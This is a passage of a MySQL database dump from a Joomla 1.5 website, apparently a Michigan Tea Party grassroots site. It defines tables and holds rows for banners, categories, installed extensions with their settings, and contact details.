00:00:00','0000-00-00 00:00:00','',''),(7,1,'','Joomla! Promo Shop','joomla-promo-shop',0,22,1,'shop-ad.jpg','http://shop.joomla.org','2007-09-19 17:26:24',0,0,'0000-00-00 00:00:00','','',33,'',0,3,'0000-00-00 00:00:00','0000-00-00 00:00:00','',''),(8,1,'','Joomla! Promo Books','joomla-promo-books',0,20,0,'shop-ad-books.jpg','http://shop.joomla.org/amazoncom-bookstores.html','2007-09-19 17:28:01',0,0,'0000-00-00 00:00:00','','',33,'',0,4,'0000-00-00 00:00:00','0000-00-00 00:00:00','',''),(9,2,'','Tea Party Express','tea-party-express',0,576,3,'TPXEntryPageTopBanner.jpg','teapartyexpress.org','2010-06-09 22:32:21',1,0,'0000-00-00 00:00:00','','',19,'',0,1,'0000-00-00 00:00:00','0000-00-00 00:00:00','','width=0\nheight=0');
/*!40000 ALTER TABLE `jos_banner` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_bannerclient`
--

DROP TABLE IF EXISTS `jos_bannerclient`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_bannerclient` (
  `cid` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL DEFAULT '',
  `contact` varchar(255) NOT NULL DEFAULT '',
  `email` varchar(255) NOT NULL DEFAULT '',
  `extrainfo` text NOT NULL,
  `checked_out` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out_time` time DEFAULT NULL,
  `editor` varchar(50) DEFAULT NULL,
  PRIMARY KEY (`cid`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_bannerclient`
--

LOCK TABLES `jos_bannerclient` WRITE;
/*!40000 ALTER TABLE `jos_bannerclient` DISABLE KEYS */;
INSERT INTO `jos_bannerclient` VALUES (1,'Open Source Matters','Administrator','admin@opensourcematters.org','',0,'00:00:00',NULL),(2,'TPX','Tea Party Express','info@teapartyexpress.org','',0,'00:00:00','');
/*!40000 ALTER TABLE `jos_bannerclient` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_bannertrack`
--

DROP TABLE IF EXISTS `jos_bannertrack`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_bannertrack` (
  `track_date` date NOT NULL,
  `track_type` int(10) unsigned NOT NULL,
  `banner_id` int(10) unsigned NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_bannertrack`
--

LOCK TABLES `jos_bannertrack` WRITE;
/*!40000 ALTER TABLE `jos_bannertrack` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_bannertrack` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_categories`
--

DROP TABLE IF EXISTS `jos_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_categories` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL DEFAULT '0',
  `title` varchar(255) NOT NULL DEFAULT '',
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `image` varchar(255) NOT NULL DEFAULT '',
  `section` varchar(50) NOT NULL DEFAULT '',
  `image_position` varchar(30) NOT NULL DEFAULT '',
  `description` text NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `editor` varchar(50) DEFAULT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `cat_idx` (`section`,`published`,`access`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`)
) ENGINE=MyISAM AUTO_INCREMENT=22 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_categories`
--

LOCK TABLES `jos_categories` WRITE;
/*!40000 ALTER TABLE `jos_categories` DISABLE KEYS */;
INSERT INTO `jos_categories` VALUES (1,0,'Latest','Latest News','latest','taking_notes.jpg','1','left','The latest news from the Joomla! Team',1,0,'0000-00-00 00:00:00','',0,0,1,''),(2,0,'Joomla!','Joomla!','joomla','clock.jpg','com_weblinks','left','A selection of links that are all related to the Joomla! Project.',0,0,'0000-00-00 00:00:00','',0,0,0,''),(3,0,'Newsflash','Newsflash','newsflash','','2','left','',1,0,'0000-00-00 00:00:00','',0,0,0,''),(4,0,'Joomla!','Joomla!','joomla','','com_newsfeeds','left','',1,0,'0000-00-00 00:00:00','',2,0,0,''),(5,0,'Business: general','Business: general','business-general','','com_newsfeeds','left','',1,0,'0000-00-00 00:00:00','',1,0,0,''),(7,0,'Examples','Example FAQs','examples','key.jpg','3','left','Here you will find an example set of FAQs.',1,62,'2010-06-13 15:19:41','',0,0,2,''),(9,0,'Finance','Finance','finance','','com_newsfeeds','left','',1,0,'0000-00-00 00:00:00','',5,0,0,''),(10,0,'Linux','Linux','linux','','com_newsfeeds','left','<br />\r\n',1,0,'0000-00-00 00:00:00','',6,0,0,''),(11,0,'Internet','Internet','internet','','com_newsfeeds','left','',1,0,'0000-00-00 00:00:00','',7,0,0,''),(12,0,'Contacts','Contacts','contacts','','com_contact_details','left','Contact Details for this website',1,62,'2010-06-12 23:12:32','',0,0,0,''),(13,0,'Features','Features','features','','4','left','',1,0,'0000-00-00 00:00:00','',4,0,0,'imagefolders=*2*'),(14,0,'General','General','general','','4','left','',1,0,'0000-00-00 00:00:00','',3,0,0,'imagefolders=*2*'),(15,0,'Tutorials','Tutorials','tutorials','','4','left','',1,0,'0000-00-00 00:00:00','',2,0,0,'imagefolders=*2*'),(16,0,'Quick Start Guide','Quick Start Guide','quick-start-guide','','4','left','<p>This <strong>Quick Start Guide</strong> will provide you detailed information about each step you need to take in order to get your site look like JSN Epic demo site. It is assumed that you have already installed the latest Joomla! 1.0 with sample content and downloaded JSN Epic PRO package.</p>\r\n<p class=\"alert\"><strong>This collection of tutorials is designed for JSN Epic PRO version</strong> and many features discussed here are NOT available in free version. For more information about the difference between free and PRO version please visit section <strong>Features</strong> of this site.</p>\r\n<p class=\"info\">The PDF version of this tutorial is included in JSN Epic PRO download package for convenient references.</p>',1,0,'0000-00-00 00:00:00','',1,0,0,'imagefolders=/jsn_epic/quick-start-guide'),(17,0,'Testimonials','','testimonials','','4','left','',1,0,'0000-00-00 00:00:00',NULL,5,0,0,''),(18,0,'Other Groups','','other-groups','','com_weblinks','left','<p>Links to Other Organizations</p>',1,0,'0000-00-00 00:00:00',NULL,0,0,0,''),(19,0,'Grassroots','','grassroots','','com_banner','left','',1,62,'2010-06-13 00:09:13',NULL,1,0,0,''),(20,0,'Default','Default','default','','com_jevents','left','',1,0,'0000-00-00 00:00:00',NULL,1,0,0,''),(21,0,'TEA Party Events and Meetings','','tea-party-events-and-meetings','','com_weblinks','left','',1,0,'0000-00-00 00:00:00',NULL,0,0,0,'');
/*!40000 ALTER TABLE `jos_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_components`
--

DROP TABLE IF EXISTS `jos_components`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_components` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL DEFAULT '',
  `link` varchar(255) NOT NULL DEFAULT '',
  `menuid` int(11) unsigned NOT NULL DEFAULT '0',
  `parent` int(11) unsigned NOT NULL DEFAULT '0',
  `admin_menu_link` varchar(255) NOT NULL DEFAULT '',
  `admin_menu_alt` varchar(255) NOT NULL DEFAULT '',
  `option` varchar(50) NOT NULL DEFAULT '',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `admin_menu_img` varchar(255) NOT NULL DEFAULT '',
  `iscore` tinyint(4) NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  `enabled` tinyint(4) NOT NULL DEFAULT '1',
  PRIMARY KEY (`id`),
  KEY `parent_option` (`parent`,`option`(32))
) ENGINE=MyISAM AUTO_INCREMENT=79 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_components`
--

LOCK TABLES `jos_components` WRITE;
/*!40000 ALTER TABLE `jos_components` DISABLE KEYS */;
INSERT INTO `jos_components` VALUES (1,'Banners','',0,0,'','Banner Management','com_banners',0,'js/ThemeOffice/component.png',0,'track_impressions=0\ntrack_clicks=0\ntag_prefix=\n\n',1),(2,'Banners','',0,1,'option=com_banners','Active Banners','com_banners',1,'js/ThemeOffice/edit.png',0,'',1),(3,'Clients','',0,1,'option=com_banners&c=client','Manage Clients','com_banners',2,'js/ThemeOffice/categories.png',0,'',1),(4,'Web Links','option=com_weblinks',0,0,'','Manage Weblinks','com_weblinks',0,'js/ThemeOffice/component.png',0,'show_comp_description=1\ncomp_description=\nshow_link_hits=1\nshow_link_description=1\nshow_other_cats=1\nshow_headings=1\ntarget=1\nlink_icons=\n\n',1),(5,'Links','',0,4,'option=com_weblinks','View existing weblinks','com_weblinks',1,'js/ThemeOffice/edit.png',0,'',1),(6,'Categories','',0,4,'option=com_categories&section=com_weblinks','Manage weblink categories','',2,'js/ThemeOffice/categories.png',0,'',1),(7,'Contacts','option=com_contact',0,0,'','Edit contact details','com_contact',0,'js/ThemeOffice/component.png',1,'contact_icons=0\nicon_address=\nicon_email=\nicon_telephone=\nicon_fax=\nicon_misc=\nshow_headings=1\nshow_position=1\nshow_email=0\nshow_telephone=1\nshow_mobile=1\nshow_fax=1\nbannedEmail=\nbannedSubject=\nbannedText=\nsession=1\ncustomReply=0\n\n',1),(8,'Contacts','',0,7,'option=com_contact','Edit contact details','com_contact',0,'js/ThemeOffice/edit.png',1,'',1),(9,'Categories','',0,7,'option=com_categories&section=com_contact_details','Manage contact categories','',2,'js/ThemeOffice/categories.png',1,'contact_icons=0\nicon_address=\nicon_email=\nicon_telephone=\nicon_fax=\nicon_misc=\nshow_headings=1\nshow_position=1\nshow_email=0\nshow_telephone=1\nshow_mobile=1\nshow_fax=1\nbannedEmail=\nbannedSubject=\nbannedText=\nsession=1\ncustomReply=0\n\n',1),(10,'Polls','option=com_poll',0,0,'option=com_poll','Manage Polls','com_poll',0,'js/ThemeOffice/component.png',0,'',1),(11,'News Feeds','option=com_newsfeeds',0,0,'','News Feeds Management','com_newsfeeds',0,'js/ThemeOffice/component.png',0,'',1),(12,'Feeds','',0,11,'option=com_newsfeeds','Manage News Feeds','com_newsfeeds',1,'js/ThemeOffice/edit.png',0,'show_headings=1\nshow_name=1\nshow_articles=1\nshow_link=1\nshow_cat_description=1\nshow_cat_items=1\nshow_feed_image=1\nshow_feed_description=1\nshow_item_description=1\nfeed_word_count=0\n\n',1),(13,'Categories','',0,11,'option=com_categories&section=com_newsfeeds','Manage Categories','',2,'js/ThemeOffice/categories.png',0,'',1),(14,'User','option=com_user',0,0,'','','com_user',0,'',1,'',1),(15,'Search','option=com_search',0,0,'option=com_search','Search Statistics','com_search',0,'js/ThemeOffice/component.png',1,'enabled=0\n\n',1),(16,'Categories','',0,1,'option=com_categories&section=com_banner','Categories','',3,'',1,'',1),(17,'Wrapper','option=com_wrapper',0,0,'','Wrapper','com_wrapper',0,'',1,'',1),(18,'Mail To','',0,0,'','','com_mailto',0,'',1,'',1),(19,'Media Manager','',0,0,'option=com_media','Media Manager','com_media',0,'',1,'upload_extensions=bmp,csv,doc,epg,gif,ico,jpg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,EPG,GIF,ICO,JPG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS\nupload_maxsize=10000000\nfile_path=images\nimage_path=images/stories\nrestrict_uploads=1\nallowed_media_usergroup=3\ncheck_mime=1\nimage_extensions=bmp,gif,jpg,png\nignore_extensions=\nupload_mime=image/jpeg,image/gif,image/png,image/bmp,application/x-shockwave-flash,application/msword,application/excel,application/pdf,application/powerpoint,text/plain,application/x-zip\nupload_mime_illegal=text/html\nenable_flash=0\n\n',1),(20,'Articles','option=com_content',0,0,'','','com_content',0,'',1,'show_noauth=0\nshow_title=1\nlink_titles=0\nshow_intro=1\nshow_section=0\nlink_section=0\nshow_category=0\nlink_category=0\nshow_author=1\nshow_create_date=1\nshow_modify_date=1\nshow_item_navigation=0\nshow_readmore=1\nshow_vote=0\nshow_icons=1\nshow_pdf_icon=0\nshow_print_icon=1\nshow_email_icon=1\nshow_hits=1\nfeed_summary=0\nfilter_tags=\nfilter_attritbutes=\n\n',1),(21,'Configuration Manager','',0,0,'','Configuration','com_config',0,'',1,'',1),(22,'Installation Manager','',0,0,'','Installer','com_installer',0,'',1,'',1),(23,'Language Manager','',0,0,'','Languages','com_languages',0,'',1,'',1),(24,'Mass mail','',0,0,'','Mass Mail','com_massmail',0,'',1,'mailSubjectPrefix=\nmailBodySuffix=\n\n',1),(25,'Menu Editor','',0,0,'','Menu Editor','com_menus',0,'',1,'',1),(27,'Messaging','',0,0,'','Messages','com_messages',0,'',1,'',1),(28,'Modules Manager','',0,0,'','Modules','com_modules',0,'',1,'',1),(29,'Plugin Manager','',0,0,'','Plugins','com_plugins',0,'',1,'',1),(30,'Template Manager','',0,0,'','Templates','com_templates',0,'',1,'',1),(31,'User Manager','',0,0,'','Users','com_users',0,'',1,'allowUserRegistration=1\nnew_usertype=Registered\nuseractivation=1\nfrontend_userparams=1\n\n',1),(32,'Cache Manager','',0,0,'','Cache','com_cache',0,'',1,'',1),(33,'Control Panel','',0,0,'','Control Panel','com_cpanel',0,'',1,'',1),(34,'JSN imageshow','option=com_imageshow',0,0,'option=com_imageshow','JSN imageshow','com_imageshow',0,'components/com_imageshow/assets/images/icon-uni-16/menu-main.png',0,'',1),(35,'Control Panel','',0,34,'option=com_imageshow','Control Panel','com_imageshow',0,'components/com_imageshow/assets/images/icon-uni-16/menu-controlpanel.png',0,'',1),(36,'Showlists','',0,34,'option=com_imageshow&controller=showlist','Showlists','com_imageshow',1,'components/com_imageshow/assets/images/icon-uni-16/menu-showlist.png',0,'',1),(37,'Showcases','',0,34,'option=com_imageshow&controller=showcase','Showcases','com_imageshow',2,'components/com_imageshow/assets/images/icon-uni-16/menu-showcase.png',0,'',1),(38,'Configuration & Maintenance','',0,34,'option=com_imageshow&controller=maintenance&type=configs','Configuration & Maintenance','com_imageshow',3,'components/com_imageshow/assets/images/icon-uni-16/menu-maintenance.png',0,'',1),(39,'Help & Support','',0,34,'option=com_imageshow&controller=help','Help & Support','com_imageshow',4,'components/com_imageshow/assets/images/icon-uni-16/menu-help.png',0,'',1),(40,'About','',0,34,'option=com_imageshow&controller=about','About','com_imageshow',5,'components/com_imageshow/assets/images/icon-uni-16/menu-about.png',0,'',1),(41,'JEvents MVC','option=com_jevents',0,0,'option=com_jevents','JEvents MVC','com_jevents',0,'js/ThemeOffice/component.png',0,'com_calViewName=ext\ncom_dateformat=1\ncom_calUseStdTime=1\ncom_blockRobots=3\nrobotprior=-1 month\nrobotpost=+1 month\ncom_cache=0\ncom_calHeadline=comp\ncom_calUseIconic=1\ncom_navbarcolor=blue\ncom_earliestyear=2000\ncom_latestyear=2015\ncom_starday=0\ncom_print_icon_view=1\ncom_email_icon_view=1\ncom_hideshowbycats=1\ninstalllayouts=0\ncom_copyright=1\nlargeDataSetLimit=100000\nshowPanelNews=0\nhideMigration=1\nicaltimezonelive=America/Detroit\njevadmin=63\nauthorisedonly=1\njevcreator_level=19\njeveditor_level=20\njevpublish_level=21\njevpublishown=0\nicaltimezone=America/Indiana/Knox\nicalkey=nemo dat quod non habet\nshowicalicon=0\ndisableicalexport=0\nicalmultiday=0\nicalmultiday24h=0\neditpopup=0\ndisablerepeats=0\npopupw=800\npopuph=500\ndefaultcat=0\nforcepopupcalendar=1\ncom_calForceCatColorEventForm=2\ncom_single_pane_edit=0\ntimebeforedescription=0\ncom_show_editor_buttons=0\ncom_editor_button_exceptions=pagebreak,readmore\ncom_notifyboth=0\ncom_notifyallevents=0\nshowpriority=0\nmultiday=1\ncom_byview=0\ncom_mailview=1\ncom_hitsview=1\ncom_repeatview=1\ncom_calCutTitle=15\ncom_calMaxDisplay=15\ncom_calDisplayStarttime=1\ncom_enableToolTip=1\ntooltiptype=joomla\ncom_calTTBackground=1\ncom_calTTPosX=LEFT\ncom_calTTPosY=BELOW\ncom_calTTShadow=0\ncom_calTTShadowX=0\ncom_calTTShadowY=0\ncom_calEventListRowsPpg=10\nshowyearpast=1\ncom_showrepeats=1\nshowyeardate=0\ncom_rss_cache=1\ncom_rss_cache_time=3600\ncom_rss_count=5\ncom_rss_live_bookmarks=1\ncom_rss_modid=0\ncom_rss_title=JEvents Syndication for Joomla\ncom_rss_description=Powered by JEvents!\ncom_rss_limit_text=0\ncom_rss_text_length=20\ncom_rss_logo=\nmodcal_DispLastMonth=NO\nmodcal_DispLastMonthDays=0\nmodcal_DispNextMonth=NO\nmodcal_DispNextMonthDays=0\nmodcal_LinkCloaking=0\nmodlatest_MaxEvents=10\nmodlatest_Mode=0\nmodlatest_Days=5\nstartnow=0\nmodlatest_NoRepeat=1\nmodlatest_DispLinks=1\nmodlatest_DispYear=0\nmodlatest_DisDateStyle=0\nmodlatest_DisTitleStyle=0\nmodlatest_LinkToCal=0\nmodlatest_LinkCloaking=0\nmodlatest_SortReverse=0\nmodlatest_CustFmtStr=${eventDate}[!a: - ${endDate(%I:%M%p)}]\\n${title}\nmodlatest_RSS=0\n\n',1),(42,'PowerMail 4 Joomla Pro','option=com_powermail',0,0,'option=com_powermail','PowerMail 4 Joomla Pro','com_powermail',0,'components/com_powermail/assets/powermail-ico-menu.png',0,'',1),(43,'Content','',0,42,'option=com_powermail&view=items','Content','com_powermail',0,'js/ThemeOffice/article.png',0,'',1),(44,'Users','',0,42,'option=com_powermail&view=users','Users','com_powermail',1,'js/ThemeOffice/user.png',0,'',1),(45,'Accounts','',0,42,'option=com_powermail&view=accounts','Accounts','com_powermail',2,'js/ThemeOffice/messages.png',0,'',1),(46,'Categories','',0,42,'option=com_categories&section=com_content','Categories','com_powermail',3,'js/ThemeOffice/category.png',0,'',1),(47,'Sections','',0,42,'option=com_sections&scope=content','Sections','com_powermail',4,'js/ThemeOffice/section.png',0,'',1),(48,'Help','',0,42,'option=com_powermail&view=help','Help','com_powermail',5,'js/ThemeOffice/help.png',0,'',1),(49,'JComments','option=com_jcomments',0,0,'option=com_jcomments','JComments','com_jcomments',0,'class:jcomments-logo',0,'object_group=com_jcomments\nobject_id=1\n',1),(50,'Manage comments','',0,49,'option=com_jcomments&task=view','Manage comments','com_jcomments',0,'class:jcomments-edit',0,'',1),(51,'Settings','',0,49,'option=com_jcomments&task=settings','Settings','com_jcomments',1,'class:jcomments-settings',0,'',1),(52,'Smiles','',0,49,'option=com_jcomments&task=smiles','Smiles','com_jcomments',2,'class:jcomments-smiles',0,'',1),(53,'Subscriptions','',0,49,'option=com_jcomments&task=subscriptions','Subscriptions','com_jcomments',3,'class:jcomments-subscriptions',0,'',1),(54,'Custom BBCode','',0,49,'option=com_jcomments&task=custombbcodes','Custom BBCode','com_jcomments',4,'class:jcomments-custombbcode',0,'',1),(55,'Import','',0,49,'option=com_jcomments&task=import','Import','com_jcomments',5,'class:jcomments-import',0,'',1),(56,'About','',0,49,'option=com_jcomments&task=about','About','com_jcomments',6,'class:jcomments-logo',0,'',1),(57,'RPX','option=com_rpx',0,0,'option=com_rpx','RPX','com_rpx',0,'js/ThemeOffice/component.png',0,'',1),(58,'ArtForms','option=com_artforms',0,0,'option=com_artforms','ArtForms','com_artforms',0,'../administrator/components/com_artforms/assets/images/iconlogo.png',0,'rootfronttitle=ArtForms\nfronttext=Select a form',1),(59,'Forms','',0,58,'option=com_artforms&task=showaf','Forms','com_artforms',0,'../administrator/components/com_artforms/assets/images/forms16.png',0,'',1),(60,'Inbox Forms','',0,58,'option=com_artforms&task=rforms','Inbox Forms','com_artforms',1,'../administrator/components/com_artforms/assets/images/rforms16.png',0,'',1),(61,'Tutorial','',0,58,'option=com_artforms&task=help','Tutorial','com_artforms',2,'../administrator/components/com_artforms/assets/images/help16.png',0,'',1),(62,'Edit Language','',0,58,'option=com_artforms&task=language','Edit Language','com_artforms',3,'../administrator/components/com_artforms/assets/images/lang16.png',0,'',1),(63,'Edit CSS','',0,58,'option=com_artforms&task=cssedit','Edit CSS','com_artforms',4,'../administrator/components/com_artforms/assets/images/css16.png',0,'',1),(64,'Settings','',0,58,'option=com_artforms&task=config','Settings','com_artforms',5,'../administrator/components/com_artforms/assets/images/config16.png',0,'',1),(65,'Update','',0,58,'option=com_artforms&task=update','Update','com_artforms',6,'../administrator/components/com_artforms/assets/images/update16.png',0,'',1),(66,'About ArtForms','',0,58,'option=com_artforms&task=info','About ArtForms','com_artforms',7,'../administrator/components/com_artforms/assets/images/info16.png',0,'',1),(67,'AcyMailing','option=com_acymailing',0,0,'option=com_acymailing','AcyMailing','com_acymailing',0,'../components/com_acymailing/images/icons/icon-16-acymailing.png',0,'',1),(68,'Users','',0,67,'option=com_acymailing&ctrl=subscriber','Users','com_acymailing',0,'../includes/js/user.png',0,'',1),(69,'Lists','',0,67,'option=com_acymailing&ctrl=list','Lists','com_acymailing',1,'../includes/js/ThemeOffice/static.png',0,'',1),(70,'Newsletters','',0,67,'option=com_acymailing&ctrl=newsletter','Newsletters','com_acymailing',2,'../components/com_acymailing/images/icons/icon-16-newsletter.png',0,'',1),(71,'Templates','',0,67,'option=com_acymailing&ctrl=template','Templates','com_acymailing',3,'../components/com_acymailing/images/icons/icon-16-acytemplate.png',0,'',1),(72,'Queue','',0,67,'option=com_acymailing&ctrl=queue','Queue','com_acymailing',4,'../components/com_acymailing/images/icons/icon-16-process.png',0,'',1),(73,'Statistics','',0,67,'option=com_acymailing&ctrl=stats','Statistics','com_acymailing',5,'../components/com_acymailing/images/icons/icon-16-stats.png',0,'',1),(74,'Configuration','',0,67,'option=com_acymailing&ctrl=config','Configuration','com_acymailing',6,'../includes/js/ThemeOffice/config.png',0,'',1),(75,'EasyCaptcha','option=com_easycaptcha',0,0,'option=com_easycaptcha','EasyCaptcha','com_easycaptcha',0,'components/com_easycaptcha/images/easycaptcha_ico.png',0,'',1),(76,'Manage Captchas','',0,75,'option=com_easycaptcha','Manage Captchas','com_easycaptcha',0,'components/com_easycaptcha/images/easycaptcha_manage.png',0,'',1),(77,'Upload Captcha','',0,75,'option=com_easycaptcha&controller=captcha&task=upload','Upload Captcha','com_easycaptcha',1,'components/com_easycaptcha/images/easycaptcha_package.png',0,'',1),(78,'About','',0,75,'option=com_easycaptcha&task=about','About','com_easycaptcha',2,'components/com_easycaptcha/images/easycaptcha_info.png',0,'',1);
/*!40000 ALTER TABLE `jos_components` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_contact_details`
--

DROP TABLE IF EXISTS `jos_contact_details`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_contact_details` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `con_position` varchar(255) DEFAULT NULL,
  `address` text,
  `suburb` varchar(100) DEFAULT NULL,
  `state` varchar(100) DEFAULT NULL,
  `country` varchar(100) DEFAULT NULL,
  `postcode` varchar(100) DEFAULT NULL,
  `telephone` varchar(255) DEFAULT NULL,
  `fax` varchar(255) DEFAULT NULL,
  `misc` mediumtext,
  `image` varchar(255) DEFAULT NULL,
  `imagepos` varchar(20) DEFAULT NULL,
  `email_to` varchar(255) DEFAULT NULL,
  `default_con` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `published` tinyint(1) unsigned NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text NOT NULL,
  `user_id` int(11) NOT NULL DEFAULT '0',
  `catid` int(11) NOT NULL DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `mobile` varchar(255) NOT NULL DEFAULT '',
  `webpage` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `catid` (`catid`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_contact_details`
--

LOCK TABLES `jos_contact_details` WRITE;
/*!40000 ALTER TABLE `jos_contact_details` DISABLE KEYS */;
INSERT INTO `jos_contact_details` VALUES (1,'Donna Nakagiri','donna-nakagiri','Regional Administrator','1234 E West Street','Hartland','MI','USA','48***','810-777-7777','810-999-9999','Miscellanous info','','top','email@email.com',0,0,0,'0000-00-00 00:00:00',1,'show_name=1\nshow_position=1\nshow_email=0\nshow_street_address=1\nshow_suburb=1\nshow_state=1\nshow_postcode=1\nshow_country=1\nshow_telephone=1\nshow_mobile=1\nshow_fax=1\nshow_webpage=1\nshow_misc=1\nshow_image=1\nallow_vcard=0\ncontact_icons=0\nicon_address=\nicon_email=\nicon_telephone=\nicon_mobile=\nicon_fax=\nicon_misc=\nshow_email_form=1\nemail_description=1\nshow_email_copy=1\nbanned_email=\nbanned_subject=\nbanned_text=',62,12,0,'810-888-8888','http://retakeourgov.com'),(2,'Contact Us','website-manager','Website Manager','','Hartland','MI','USA','','to email us','','Email us a message by filling out the information below','wes.jpg',NULL,'wes@retakeourgov.com',0,1,0,'0000-00-00 00:00:00',0,'show_name=1\nshow_position=0\nshow_email=0\nshow_street_address=0\nshow_suburb=0\nshow_state=0\nshow_postcode=0\nshow_country=0\nshow_telephone=0\nshow_mobile=0\nshow_fax=0\nshow_webpage=1\nshow_misc=1\nshow_image=0\nallow_vcard=0\ncontact_icons=1\nicon_address=\nicon_email=\nicon_telephone=\nicon_mobile=\nicon_fax=\nicon_misc=\nshow_email_form=1\nemail_description=\nshow_email_copy=1\nbanned_email=\nbanned_subject=\nbanned_text=',64,12,0,'click on contact us','http://RetakeOurGov.com');
/*!40000 ALTER TABLE `jos_contact_details` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_content`
--

DROP TABLE IF EXISTS `jos_content`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_content` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `title_alias` varchar(255) NOT NULL DEFAULT '',
  `introtext` mediumtext NOT NULL,
  `fulltext` mediumtext NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '0',
  `sectionid` int(11) unsigned NOT NULL DEFAULT '0',
  `mask` int(11) unsigned NOT NULL DEFAULT '0',
  `catid` int(11) unsigned NOT NULL DEFAULT '0',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(11) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `images` text NOT NULL,
  `urls` text NOT NULL,
  `attribs` text NOT NULL,
  `version` int(11) unsigned NOT NULL DEFAULT '1',
  `parentid` int(11) unsigned NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `metakey` text NOT NULL,
  `metadesc` text NOT NULL,
  `access` int(11) unsigned NOT NULL DEFAULT '0',
  `hits` int(11) unsigned NOT NULL DEFAULT '0',
  `metadata` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_section` (`sectionid`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`state`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`)
) ENGINE=MyISAM AUTO_INCREMENT=52 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_content`
--

LOCK TABLES `jos_content` WRITE;
/*!40000 ALTER TABLE `jos_content` DISABLE KEYS */;
